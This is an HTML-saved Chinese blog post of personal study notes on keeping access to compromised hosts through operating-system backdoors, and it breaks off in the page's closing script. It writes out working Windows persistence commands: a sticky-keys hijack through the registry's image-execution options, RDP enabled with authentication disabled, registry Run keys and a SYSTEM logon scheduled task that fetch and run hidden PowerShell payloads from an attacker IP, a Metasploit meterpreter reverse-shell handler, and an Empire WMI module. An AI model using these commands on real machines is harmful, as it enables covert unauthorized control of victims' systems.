<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="攻击者在提升权限后，通常会简历后门来维持对目标主机的控制权。 Windows：粘滞键后门&#x2F;映像劫持shift后门参考链接：https:&#x2F;&#x2F;blog.csdn.net&#x2F;fageweiketang&#x2F;article&#x2F;details&#x2F;88317656 在Windows连续按5下shift键就可以调出粘滞键。旧方法粘滞键后门的原理是将sethc.exe程序替换成后门程序，但该方法只适用于winvista系统">
<meta property="og:type" content="article">
<meta property="og:title" content="内网安全学习笔记-Ⅶ：权限维持之操作系统后门">
<meta property="og:url" content="http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/index.html">
<meta property="og:site_name" content="R17a&#39;s blog">
<meta property="og:description" content="攻击者在提升权限后，通常会简历后门来维持对目标主机的控制权。 Windows：粘滞键后门&#x2F;映像劫持shift后门参考链接：https:&#x2F;&#x2F;blog.csdn.net&#x2F;fageweiketang&#x2F;article&#x2F;details&#x2F;88317656 在Windows连续按5下shift键就可以调出粘滞键。旧方法粘滞键后门的原理是将sethc.exe程序替换成后门程序，但该方法只适用于winvista系统">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/imgs/image-20210221142332235.png">
<meta property="article:published_time" content="2021-02-21T02:57:38.000Z">
<meta property="article:modified_time" content="2021-02-21T02:57:38.000Z">
<meta property="article:author" content="R17a">
<meta property="article:tag" content="内网安全">
<meta property="article:tag" content="权限维持">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/imgs/image-20210221142332235.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>内网安全学习笔记-Ⅶ：权限维持之操作系统后门</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/download/">Download</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2021/02/25/CVE-2021-21972-VMware-vCenter%E6%9C%AA%E6%8E%88%E6%9D%83%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2021/02/20/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A5%EF%BC%9A%E5%9F%9F%E6%8E%A7%E5%AE%89%E5%85%A8%E5%8F%8A%E8%B7%A8%E5%9F%9F%E6%94%BB%E5%87%BB/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&text=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&is_video=false&description=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=内网安全学习笔记-Ⅶ：权限维持之操作系统后门&body=Check out this article: http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&name=内网安全学习笔记-Ⅶ：权限维持之操作系统后门&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&t=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows："><span class="toc-number">1.</span> <span class="toc-text">Windows：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#粘滞键后门-映像劫持shift后门"><span class="toc-number">1.1.</span> <span class="toc-text">粘滞键后门&#x2F;映像劫持shift后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#影子用户后门"><span class="toc-number">1.2.</span> <span class="toc-text">影子用户后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#注册表自启动后门"><span class="toc-number">1.3.</span> <span class="toc-text">注册表自启动后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#计划任务后门"><span class="toc-number">1.4.</span> <span class="toc-text">计划任务后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#WMI后门"><span class="toc-number">1.5.</span> <span class="toc-text">WMI后门</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux："><span class="toc-number">2.</span> <span class="toc-text">Linux：</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        内网安全学习笔记-Ⅶ：权限维持之操作系统后门
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">R17a</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-02-21T02:57:38.000Z" itemprop="datePublished">2021-02-21</time>
        
        (Updated: <time datetime="2021-02-21T02:57:38.000Z" itemprop="dateModified">2021-02-21</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/">内网安全</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" rel="tag">内网安全</a>, <a class="tag-link" href="/tags/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" rel="tag">权限维持</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>攻击者在提升权限后，通常会简历后门来维持对目标主机的控制权。</p>
<h3 id="Windows："><a href="#Windows：" class="headerlink" title="Windows："></a><a href="https://xz.aliyun.com/t/6461" target="_blank" rel="noopener">Windows：</a></h3><h4 id="粘滞键后门-映像劫持shift后门"><a href="#粘滞键后门-映像劫持shift后门" class="headerlink" title="粘滞键后门/映像劫持shift后门"></a>粘滞键后门/映像劫持shift后门</h4><p>参考链接：<a href="https://blog.csdn.net/fageweiketang/article/details/88317656" target="_blank" rel="noopener">https://blog.csdn.net/fageweiketang/article/details/88317656</a></p>
<p>在Windows连续按5下shift键就可以调出粘滞键。旧方法粘滞键后门的原理是将sethc.exe程序替换成后门程序，但该方法只适用于winvista系统及以下，其它系统修改 sethc 会提示需要 trustedinstaller 权限。</p>
<p>新方法设置粘滞键后门是通过注册表来实现，思路就是通过修改注册表的映像劫持和打开其远程桌面来实现。映像劫持简单理解就是当自己打开程序 a 的时候，实际上是打开的程序 b。</p>
<p>设置映像劫持较简单，只需要在注册表的 HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options 位置添加被劫持的程序然后简单设置一下即可，我们通过命令行执行以下程序：</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># 命令说明：reg add 是向注册表添加记录，后面跟的是注册表的位置，这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。Image File Execution Option 这个目录就是用来设置镜像劫持的，要被劫持的就是命令中的 sethc 粘滞键程序，随后通过 / v 来指定键名，这个键名 debugger 是固定的，然后通过 / t 来指定类型，即 REG_SZ 字符串类型，最后通过 / d 来指定键的值，即被恶意替换的程序，也就是我们的 <span class="built_in">cmd</span>。</span><br><span class="line">REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\<span class="built_in">cmd</span>.exe"</span><br><span class="line"># 设置完镜像劫持后就已经有了我们旧方法中直接替换 sethc 程序的效果，但我们为了方便利用，可以开启目标机的远程桌面，这里我们也通过注册表来设置一下，需要设置两个参数。第一个是把远程桌面链接的用户鉴定选项设置为关闭状态，即值为 <span class="number">0</span>，命令行运行以下命令：</span><br><span class="line">REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d <span class="number">0</span></span><br><span class="line"># 第二个是把远程桌面连接的安全层设置为 <span class="number">0</span>，命令行运行以下命令</span><br><span class="line">REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d <span class="number">0</span></span><br><span class="line"># 开启远程桌面连接，首先是配置一下防火墙，设置为允许远程桌面连接，运行以下命令</span><br><span class="line">netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP <span class="built_in">dir</span>=<span class="keyword">in</span> localport=<span class="number">3389</span> action=allow</span><br><span class="line"># 设置后，我们再通过注册表来设置一下允许远程桌面连接，命令行运行以下命令：</span><br><span class="line">REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /D <span class="number">0</span> /f</span><br></pre></td></tr></table></figure>

<p><img src="/imgs/image-20210221142332235.png" alt="image-20210221142332235"></p>
<p>至此，我们的粘滞键后门就已经完成了，远程桌面连接输入 ip 就会直接跳到目标锁屏页，如果用户没有设置密码则可以直接登录，如果有密码而又不知道密码的情况下，则可以用 shift 调出命令行来执行一些操作。</p>
<h4 id="影子用户后门"><a href="#影子用户后门" class="headerlink" title="影子用户后门"></a>影子用户后门</h4><p>参考之前的总结：<a href="https://rita888.github.io/2021/01/20/权限维持：Windows命令行下创建隐藏帐号/" target="_blank" rel="noopener">权限维持：Windows命令行下通过修改注册表创建隐藏帐号</a></p>
<h4 id="注册表自启动后门"><a href="#注册表自启动后门" class="headerlink" title="注册表自启动后门"></a>注册表自启动后门</h4><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># 示例：添加<span class="built_in">cmd</span>.exe自启动</span><br><span class="line">reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "test" /t REG_SZ /d "C:\Windows\System32\<span class="built_in">cmd</span>.exe" /f</span><br><span class="line"># 示例：一键无文件自启动</span><br><span class="line">reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Keyname" /t REG_SZ /d "C:\Windows\System32\WindowsPowerShell\v1.<span class="number">0</span>\powershell.exe -nop -w hidden -c \"IEX ((new-object <span class="built_in">net</span>.webclient).downloadstring('http://<span class="number">192</span>.<span class="number">168</span>.<span class="number">28</span>.<span class="number">142</span>:<span class="number">8888</span>/logo.gif'))\"" /f</span><br><span class="line"># 注意如果没有权限要先加权</span><br><span class="line"><span class="built_in">echo</span>  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [<span class="number">1</span> <span class="number">8</span> <span class="number">17</span>] &gt;regini.ini</span><br><span class="line">regini regini.ini</span><br></pre></td></tr></table></figure>

<h4 id="计划任务后门"><a href="#计划任务后门" class="headerlink" title="计划任务后门"></a>计划任务后门</h4><p>参考：<a href="https://zhuanlan.zhihu.com/p/98199824" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/98199824</a></p>
<p>Metasploit 的web_delivery模块可用于托管和生成各种格式的有效载荷</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use exploit/multi/script/web_delivery</span><br><span class="line"><span class="built_in">set</span> payload windows/x64/meterpreter/reverse_tcp</span><br><span class="line"><span class="built_in">set</span> LHOST 192.168.111.80</span><br><span class="line"><span class="built_in">set</span> LPORT 5555</span><br><span class="line"><span class="built_in">set</span> target 5</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>

<p>“ <strong>schtasks</strong> ”可执行文件可用于创建计划任务，该任务将在每个Windows登录中以SYSTEM的形式下载并执行基于PowerShell的有效负载。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">schtasks &#x2F;create &#x2F;tn PentestLab &#x2F;tr &quot;c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http:&#x2F;&#x2F;192.168.111.80:8080&#x2F;ZPWLywg&#39;&#39;&#39;))&#39;&quot; &#x2F;sc onlogon &#x2F;ru System</span><br></pre></td></tr></table></figure>

<h4 id="WMI后门"><a href="#WMI后门" class="headerlink" title="WMI后门"></a>WMI后门</h4><p>WMI后门使用了WMI的两个特征：无文件和无进程（需要管理员权限运行）。</p>
<p>原理：将代码加密存储与WMI中，即无文件；调用PowerShell执行后门程序，执行后进程消失，即无进程。</p>
<p>在Empire中使用Invoke-WMI模块</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">usemodule powershell/persistence/elevated/wmi	#设置参数run</span><br></pre></td></tr></table></figure>

<p>其它后门方法可参考：<a href="https://xz.aliyun.com/t/6461" target="_blank" rel="noopener">windows中常见后门持久化方法总结</a></p>
<h3 id="Linux："><a href="#Linux：" class="headerlink" title="Linux："></a>Linux：</h3><p>关于Linux的后门权限维持，一般有添加超级用户、SSH免密登录、Crontab定时任务反弹shell、PAM后门、Rootkit工具包等方法 可参考：<a href="https://wiki.wgpsec.org/knowledge/hw/os-backdoor.html#linux和https://bypass007.github.io/Emergency-Response-Notes/privilege/%E7%AC%AC4%E7%AF%87%EF%BC%9ALinux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81--%E5%90%8E%E9%97%A8%E7%AF%87.html" target="_blank" rel="noopener">https://wiki.wgpsec.org/knowledge/hw/os-backdoor.html#linux和https://bypass007.github.io/Emergency-Response-Notes/privilege/%E7%AC%AC4%E7%AF%87%EF%BC%9ALinux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81--%E5%90%8E%E9%97%A8%E7%AF%87.html</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/download/">Download</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Windows："><span class="toc-number">1.</span> <span class="toc-text">Windows：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#粘滞键后门-映像劫持shift后门"><span class="toc-number">1.1.</span> <span class="toc-text">粘滞键后门&#x2F;映像劫持shift后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#影子用户后门"><span class="toc-number">1.2.</span> <span class="toc-text">影子用户后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#注册表自启动后门"><span class="toc-number">1.3.</span> <span class="toc-text">注册表自启动后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#计划任务后门"><span class="toc-number">1.4.</span> <span class="toc-text">计划任务后门</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#WMI后门"><span class="toc-number">1.5.</span> <span class="toc-text">WMI后门</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Linux："><span class="toc-number">2.</span> <span class="toc-text">Linux：</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&text=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&is_video=false&description=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=内网安全学习笔记-Ⅶ：权限维持之操作系统后门&body=Check out this article: http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&title=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&name=内网安全学习笔记-Ⅶ：权限维持之操作系统后门&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://yoursite.com/2021/02/21/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-%E2%85%A6%EF%BC%9A%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/&t=内网安全学习笔记-Ⅶ：权限维持之操作系统后门" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2021
    R17a
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/download/">Download</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
